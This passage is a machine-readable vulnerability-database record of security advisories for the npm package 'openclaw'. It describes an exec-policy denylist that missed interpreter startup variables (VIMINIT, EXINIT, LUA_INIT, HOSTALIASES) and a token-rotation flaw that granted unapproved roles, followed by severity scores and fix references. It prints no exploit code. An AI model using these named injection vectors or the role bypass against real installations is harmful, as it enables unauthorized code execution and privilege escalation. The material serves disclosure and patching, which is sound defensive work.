Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe exec environment policy missed interpreter startup variables such as `VIMINIT`, `EXINIT`, `LUA_INIT`, and `HOSTALIASES`, allowing operator-supplied environment overrides to influence downstream execution or network behavior.\n\n## Technical Details\n\nThe fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage.\n\n## Fix\n\nThe issue was fixed in #63277. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d126fc62343a7b6895351f96e4e1474bc358140`\n- PR: #63277\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43584", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0012", "scoring_system": "epss", "scoring_elements": "0.30608", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0012", "scoring_system": "epss", "scoring_elements": "0.30575", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00139", "scoring_system": "epss", "scoring_elements": "0.33672", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43584" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43584", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43584" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy" }, { "reference_url": "https://github.com/advisories/GHSA-vfp4-8x56-j7c5", "reference_id": "GHSA-vfp4-8x56-j7c5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vfp4-8x56-j7c5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43584", "GHSA-vfp4-8x56-j7c5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zu4s-jnn3-1kd8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90353?format=api", "vulnerability_id": "VCID-zunq-wnnf-k3fw", "summary": "## Impact\n\nOpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing.\n\nDevice token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42422", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1604", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15986", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1603", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42422" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42422", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42422" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function" }, { "reference_url": "https://github.com/advisories/GHSA-whf9-3hcx-gq54", "reference_id": "GHSA-whf9-3hcx-gq54", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-whf9-3hcx-gq54" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42422", "GHSA-whf9-3hcx-gq54" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zunq-wnnf-k3fw" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22-beta.1" }